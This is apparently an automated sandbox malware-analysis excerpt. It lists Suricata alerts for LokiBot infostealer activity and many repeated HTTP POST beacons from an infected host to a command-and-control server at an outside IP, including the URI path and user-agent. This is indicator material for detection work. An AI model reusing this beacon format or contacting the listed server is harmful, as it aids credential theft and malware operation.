              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64214
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64226 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64206 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64178 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64243 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64178 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64246 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64255 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64255 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64226 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64226 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64243 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64206 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64255
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64185
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64238 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64194
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64238 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.18:64217 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64227 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64226
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64227 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64238
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64181 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64178 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64181 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64181 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64250 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64250 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.18:64258 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.18:64258 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2025483 - Severity 1 - ET MALWARE LokiBot Fake 404 Response : 94.156.177.220:80 -> 192.168.2.18:64204
              Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.18:64227 -> 94.156.177.220:80
              Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.18:64181 -> 94.156.177.220:80
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 176Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 176Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
              Source: global trafficHTTP traffic detected: POST /simple/five/fre.php HTTP/1.0User-Agent: Mozilla/4.08 (Charon; Inferno)Host: 94.156.177.220Accept: */*Content-Type: application/octet-streamContent-Encoding: binaryContent-Key: 508F6F5CContent-Length: 149Connection: close
